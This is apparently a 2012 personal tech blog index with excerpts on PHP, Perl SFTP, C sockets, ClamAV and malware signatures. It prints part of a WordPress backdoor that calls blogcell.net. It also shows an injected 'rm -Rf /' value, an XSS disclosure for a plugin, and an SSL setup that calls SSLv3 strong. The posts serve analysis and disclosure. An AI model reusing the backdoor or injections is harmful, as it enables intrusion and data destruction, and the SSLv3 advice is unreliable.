Posts

Showing posts from 2012

Symbolism

So I've devised a way to programmatically draw my sign in code using the GD library in PHP. Copyright Markizano.NET, LLC. All rights reserved. As long as the dimensions keep a 2x3 ratio, the measurements should scale appropriately. For example, if you start with an empty transparent 200x300 canvas, the result should look right. Devised below:

<?php
header("X-Author: Markizano Draconus");
header("Content-Type: image/png");

# An empty canvas of an image. Just an empty, transparent PNG image.
define("IMG", "Altrish.png");
$png = imagecreatefrompng(IMG);
imagealphablending($png, false);
imagesavealpha($png, true);

$stat = new stdClass;
$leftHyp = new stdClass;
$rightHyp = new stdClass;
$halfPy = new stdClass;
$margin = 10;

# 200, 300
list($stat->canvasWidth, $stat->canvasHeight) = getimagesize(IMG);
$stat->width = $stat->canvasWidth - ($margin*2); # Image area width, adding padding from the edge.
$stat->height = $stat->canvasHeight - (...

Perl Net::SSH2::SFTP Example

In my experience, code has sometimes been better at explaining than documentation. Why did I do this? Because I didn't find it immediately when I searched for it... Cheers! Copy From PasteBin!

#!/usr/bin/perl
use strict;
use warnings;
use Data::Dumper;
use Net::SSH2;
use Net::SFTP;
use Carp;
use Fcntl;
use Fcntl ':DEFAULT';

use constant SSH_USER => 'root';
use constant SSH_PASS => 'toor';
use constant SSH_HOST => 'localhost';
use constant SSH_PORT => 21;

my ( $conn, $ssh, $sftp, $buf, $buffer, $len );

# Connect and authenticate with a password; returns the Net::SSH2
# object on success, or 0 if either the connection or the auth fails.
sub ssh_connect {
    my ( $ssh, $user, $host, $pass, $port );
    ( $user, $pass, $host, $port ) = @_;
    $host ||= 'localhost';
    $port ||= 22;
    $ssh = Net::SSH2->new;
    $ssh->debug(1);
    $ssh->blocking(1);
    # Net::SSH2::connect takes the host and port as separate arguments.
    return 0 unless $ssh->connect( $host, $port );
    print "[*] Connect OK!\n";
    return 0 unless $ssh->auth( username => $user, password => $pass );
    print "[*] Auth OK!\n";
    return $ssh;
}

sub...

Get Address of a Network Interface in C

So, here I am searching the internet over and over again to find out how to easily and quickly get the IP address of a local interface, and there isn't an easy way to do it without running `ifconfig | grep | cut...` in some crazy fashion. So, here I've compiled a simple C program that will iterate through your interfaces and print the IP address of the local network interface you name on the command line. Feel free to redistribute under the GNU GPL.

https://github.com/markizano/scripts/blob/master/getifaddr/getifaddr.c

/*
 This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

 This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Gene...

Specific Exploits

Malicious crackers don't care who you are. They prey and feed on the fact that you think you're so meaningless that you'll never be targeted. I came across this one exploit that was really interesting. Someone went to some great lengths to get this poor victim.

Code:

function wp_get_footer_meta() {
    global $wpdb;
    if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'"))
        $adwb_opt = unserialize($adwb_opt);
    else {
        $adwb_opt = array( 0, '' );
        $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '" . serialize($adwb_opt) . "', 'no')");
    }
    if ((time() - $adwb_opt[0]) >= 3600) {
        $adwb_host = 'blogcell.net';
        $adwb_get = '/wpam/';
        $adwb_soc = @fsockopen($adwb_host, 80, $_en, $_es, 30);
        ...

Eval is Evil

Why? Because Kizano said so... Here are some examples I've seen in live code that just do not work (1 line each):

$success = eval('?>' . $_GET['a']);
eval("$my_obj->$key = $other_obj->$some_value");

I'm really surprised at some people. Do they not see the glaring a=<?php system("rm -Rf /"); in their URL? Just keep things easy on yourself and use this instead:

$success = (string)$_GET['a'];
$my_obj->$key = $other_obj->$some_value;

That way you don't give me a heart attack when I see you vulnerable to the most basic PHP exploit... Remember, PHP is smart enough to do what you want, but the real question is: are you l33t enough to write it? Eval is Evil!

EOF

Wordpress Securepress Plugin Vulnerability

http://wordpress.org/extend/plugins/securepress-plugin/

While looking around in a Wordpress install, I found this little gem:

line 2218: $back = isset($_POST['back']) ? $_POST['back'] : null;

line 2349: <input type="button" value="Cancel" onclick="eval(\'memos.\'+\''.addcslashes($back,"'").'\')" />

$back is never properly escaped for JS... They should use json_encode instead. I can inject arbitrary JavaScript into a POST request for the "back" parameter and have it come out in your browser. Tested on plugin version 8.4.01.

-0xKizano

apt-get update; GPG Unverified Signature

So, you added a new thing to your /etc/apt/sources.list (or, if you're smarter than most, you created your own file in /etc/apt/sources.list.d/<new-source>.list), then you go to update Aptitude, and you get the following message:

root@localhost:~# apt-get update
...
W: GPG error: http://updates.repository.backtrack-linux.org revolution Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY AB6DA34B475A6B7F

This is all fine and dandy - I can just go to the site and look for their key and install that, right? No? They don't just give me the key?! Then my packages will always be unverified and I'll be open to an exploit that allows the install of arbitrary third-party packages! Oh noes! D: Whatever shall we do? Never fear - there's a way to get that key and turn it into something apt-get can use and stop complaining about that error. Check out apt-get-key, which is a quick script that ...

Office View

Here's the view I get from my office window: I love my job :3

ClamAV Signatures

Recently while working with ClamAV I encountered some cool features I wanted to share.

Signatures Too Long

In one instance, I found out that ClamAV cannot accept signatures greater than a certain length. While I'm not exactly sure what that length is, I'm sure you'll get a syntax error if the signature is too long.

In another instance, I found that ClamAV does alright with heuristics. It may be a custom hack, but the gist of the matter is: I can input the arguments to a (function(p,a,c,k,e,r)) and only the arguments to the function, and ClamAV will detect the use of the function and will include the function in the normalized result.

Example

('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g...

Sockets in C: Error 141?

So, I've been working with sockets in C recently and encountered an issue for which I didn't easily find a solution. Hopefully this blog can end up at the top of the results because it's the post that helps others out.

Premise

So, the idea here is I have a service running that accepts connections for data to process. I have it configured to open a socket, then for each user that connects, it creates a thread and passes the client to that thread while it goes back to the socket for another potential connection. The thread handles the processing of data that passes for that connection and then terminates. Now, what happens when a client prematurely disconnects from the thread before it's finished? It would appear your application just dies: no "segmentation fault", no output, it just dies. You may notice it has exit code 141.

Problem

Turns out what was really happening was the service was sending itself signal 13, or SIGPIPE (the shell reports a process killed by signal N as exit status 128 + N, which is where the 141 comes from). If either the service or the client attempts to send d...

Do You Fix Computers?

I often get this question when I tell people that I work with computers. What's even more humorous is that the number one complaint I hear from most people is that it's slow... I usually proceed with the next question: how much RAM do you have on it? Which is usually followed by "wat?" with a blank stare, or they will proudly boast about how little they know about computers, as if it were an achievement. I wince as I ask the question "could you look on the box for this info?", which is followed up with "wat box?" At this point a faceplant is usually issued as I explain the concept of RAM and how to obtain this info. Since I've encountered a mass number of these questions and followed this conversation to no end, I think I'm going to change it up to avoid these questions and get away with the excuse: "but... The Internet is much different from your computer...". My new answer will be: I make the Internet work ^.^

PCI Compliant Apache2 SSL Configuration

In recent trials, I have encountered a need to update the configuration for Apache to conform to PCI compliance. More information on Apache's configuration with SSL can be found here. The configuration you can use to have PCI-compliant SSL for Apache is:

SSLProtocol -ALL +SSLv3 +TLSv1
SSLCipherSuite HIGH:MEDIUM:+TLSv1:!SSLv2:+SSLv3:!ADH

Breakdown:

"HIGH:MEDIUM": This will enable Apache for the seven strongest algorithms used for encryption.
"+TLSv1": Enable TLS version 1 encryption.
"!SSLv2": Disable the weaker SSL version 2 encryption.
"+SSLv3": Enable the stronger SSL version 3 encryption.
"!ADH": Disable the ADH versions of encryption, which are weaker algorithms.

Malware Signature Generation - Mid Trial

In recent research, I've discovered a few things about malware signature generation (MSG) and the whole model that surrounds it. Most of this is just speculation, which would explain the lack of citations. However, I would like to expand on what we have and create a smarter product. As I understand it, MSG is based on just understanding exploits that have already been created and basically blacklisting and whitelisting code that has already been written. The problem is there is an infinite number of ways a task can be completed, so having a complete and inclusive list (or even a list up to date with the most recent hacks) is nearly impossible. With the plethora of technologies involved in a single web page request, the probability of having a fully inclusive list of exploits is even more stark. Last week, I had a theory that if one were to compile source code to bytecode or binary, then you could inspect the result of that to determine if similar plaintext code would have the same binary ...

Malware Signature Generation

In recent work, I've encountered a task where we are identifying malware based on a signature that is a snippet of code that performs the malicious activity. These are usually JavaScript- or PHP-based exploits that disable any local protections and transfer whatever data or payload to or from the client for further exploitation. The question is how to identify these snippets of code so we can take action to have them removed. I think copying the code into a database and checking whether you ever find that snippet again would not be the most efficient way, because changed variable names, shifted lines of code, or even a different character set in the files would pretty much invalidate the signature taken from the last one found. One higher-priority question to me is: will compiling PHP and JavaScript to bytecode, and generating signatures for the binary results, be a more effective way of identifying malware than identifying copy/pasted snippets ...